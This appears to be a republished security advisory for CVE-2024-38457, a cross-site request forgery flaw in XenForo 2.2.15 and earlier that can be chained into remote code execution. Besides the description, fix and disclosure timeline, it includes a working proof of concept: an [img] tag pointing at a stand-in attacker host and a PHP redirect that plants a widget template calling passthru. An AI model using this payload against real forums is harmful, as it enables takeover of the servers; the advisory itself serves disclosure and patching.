Share
## https://sploitus.com/exploit?id=PACKETSTORM:179585
-------------------------------------------------------------------------------  
XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability  
-------------------------------------------------------------------------------  
  
  
[-] Software Link:  
  
https://xenforo.com  
  
  
[-] Affected Versions:  
  
Version 2.2.15 and prior versions.  
  
  
[-] Vulnerability Description:  
  
The XF\Admin\Controller\Widget::actionSave() method, defined into the  
/src/XF/Admin/Controller/Widget.php script, does not check whether the  
current HTTP request is a POST or a GET before saving a widget.  
XenForo does perform anti-CSRF checks for POST requests only, as such  
this method can be abused in a Cross-Site Request Forgery (CSRF)  
attack to create/modify arbitrary XenForo widgets via GET requests,  
and this can also be exploited in tandem with KIS-2024-06 to perform  
CSRF-based Remote Code Execution (RCE) attacks.  
  
Furthermore, XenForo implements a BB code system, as such this  
vulnerability could also be exploited through "Stored CSRF" attacks by  
abusing the [img] BB code tag, creating a thread or a private message  
(to be sent to the victim user) like the following:  
  
[img]https://attacker.website/exploit.php[/img]  
  
Where the exploit.php script hosted on the attacker-controlled website  
could be something like this:  
  
<?php  
  
$url = "https://victim.website/xenforo/";  
  
header("Location:  
{$url}admin.php?widgets/save&definition_id=html&widget_key=RCE&positions[pub_sidebar_top]=1&display_condition=true&options[template]={{\$xf.app.em.getRepository('XF\\Util\\Arr').filterRecursive(['id'],'passthru')}}");  
  
?>  
  
Successful exploitation of this vulnerability requires a victim user  
with permissions to administer styles or widgets to be currently  
logged into the Admin Control Panel.  
  
  
[-] Solution:  
  
Update to a fixed version or apply the vendor patches.  
  
  
[-] Disclosure Timeline:  
  
[22/02/2024] - Vulnerability details sent to SSD Secure Disclosure  
[05/06/2024] - Vendor released patches and fixed versions  
[14/06/2024] - CVE identifier requested  
[16/06/2024] - CVE identifier assigned  
[16/07/2024] - Coordinated public disclosure  
  
  
[-] CVE Reference:  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org) has  
assigned the name CVE-2024-38457 to this vulnerability.  
  
  
[-] Credits:  
  
Vulnerability discovered by Egidio Romano.  
  
  
[-] Other References:  
  
https://xenforo.com/community/threads/222133  
https://ssd-disclosure.com/ssd-advisory-xenforo-rce-via-csrf/  
  
  
[-] Original Advisory:  
  
http://karmainsecurity.com/KIS-2024-05